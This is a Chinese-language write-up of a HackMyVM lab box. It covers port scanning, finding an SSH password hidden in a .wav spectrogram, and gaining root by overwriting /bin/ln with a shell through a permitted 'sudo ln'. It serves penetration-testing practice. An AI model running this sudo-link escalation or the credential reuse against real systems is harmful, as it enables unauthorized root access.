guayu-kakeru
0%

HMV-helium

发表于 更新于 分类于

HMV-helium靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.53 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-02 20:18 CST
Nmap scan report for 192.168.240.53
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:f6:55:5f:c6:fa:fb:14:15:ae:4a:2b:38:d8:4a:30 (RSA)
|   256 b7:ac:87:6d:c4:f9:e3:9a:d4:6e:e0:4f:da:aa:22:20 (ECDSA)
|_  256 fe:e8:05:af:23:4d:3a:82:2a:64:9b:f7:35:e4:44:4a (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: RELAX
MAC Address: 56:BD:76:3F:EB:82 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.03 ms 192.168.240.53

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

开放22和80端口 直接进入web部分

web探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.53         
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
  background-image: url('screen-1.jpg');
  background-repeat: no-repeat;
  background-attachment: fixed; 
  background-size: 100% 100%;
}
</style>
    <link href="bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
<body>

这里告诉了一个用户名paul 还有一个目录/upload_sound 还有一个relax.wav可以下载
以为是wav隐写有关,但是我对misc不是很熟悉,也捣鼓了这个wav半天没有信息,结果是我搞错方向了
这个源码中的bootstrap.min.css可以访问,有一个wav文件,实际上要分析的是这个wav文件

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.53/bootstrap.min.css    
/yay/mysecretsound.wav

打开audacity选择频谱 可以看到有文字出现 这个就是密码


dancingpassyo
成功拿到用户shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kakeru)-[~/tmp]
└─# ssh paul@192.168.240.53                     
The authenticity of host '192.168.240.53 (192.168.240.53)' can't be established.
ED25519 key fingerprint is SHA256:y4b6laUdkY6jY95p0UousHuja503C9EIqNNrMD5hoqA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.240.53' (ED25519) to the list of known hosts.
paul@192.168.240.53's password: 
Permission denied, please try again.
paul@192.168.240.53's password: 
Linux helium 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 22 14:31:51 2020 from 192.168.1.58
paul@helium:~$

提权

有一个sudo权限 可以执行一个程序

1
2
3
4
5
6
7
8
paul@helium:~$ sudo -l
Matching Defaults entries for paul on helium:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on helium:
    (ALL : ALL) NOPASSWD: /usr/bin/ln
paul@helium:~$ file /usr/bin/ln
/usr/bin/ln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=90900bc68d91aa5931e338d6445b520777431a02, stripped

找到提权命令

1
2
sudo ln -fs /bin/sh /bin/ln
sudo ln

拿到rootshell 解决

1
2
3
paul@helium:~$ sudo ln -fd /bin/bash /bin/ln
paul@helium:~$ sudo ln
root@helium:/home/paul#

提权命令解释

📌 ln 命令解释
ln 是 Linux 系统中的 创建链接命令,用于创建 硬链接 或 符号链接(软链接)。

🔍 ln 命令的基本用法

1
ln [选项] 目标文件 目标链接

硬链接(默认):不使用 -s,创建一个指向同一 inode 的文件。
符号链接(软链接):使用 -s,创建一个指向目标文件路径的快捷方式。

sudo ln -fs /bin/sh /bin/ln 解析

这条命令的作用是 用 /bin/sh 替换 /bin/ln,并且强制创建符号链接。

ln

ln 命令用于 创建硬链接或符号链接,在这里用于 替换系统的 ln 命令。

-f

-f 选项 强制覆盖 目标文件(如果 /bin/ln 已经存在,它会被替换)。

-s

-s 选项 创建符号链接(软链接,而不是硬链接)。

/bin/sh

/bin/sh 是目标文件,ln 命令会创建一个指向 /bin/sh 的符号链接。

/bin/ln

/bin/ln 是目标路径,执行后 /bin/ln 变成了 /bin/sh 的别名。

由于 /bin/ln 现在指向 /bin/sh,所以 sudo ln 实际上等于 sudo /bin/sh。